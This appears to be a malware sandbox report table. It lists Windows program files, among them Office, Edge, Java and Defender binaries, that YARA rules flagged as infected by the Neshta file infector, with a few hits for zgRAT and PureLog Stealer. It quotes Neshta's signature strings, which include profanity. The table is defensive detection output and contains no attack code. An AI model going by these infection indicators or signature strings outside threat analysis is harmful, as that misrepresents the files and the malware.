C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Windows\svchost.com	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Windows\svchost.com	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Windows\svchost.com	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Windows\svchost.com	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Users\user\AppData\Local\Temp\chrome.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Users\user\AppData\Local\Temp\chrome.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Users\user\AppData\Local\Temp\chrome.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Users\user\AppData\Local\Temp\chrome.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Au3Check.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\AutoIt3\Au3Check.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
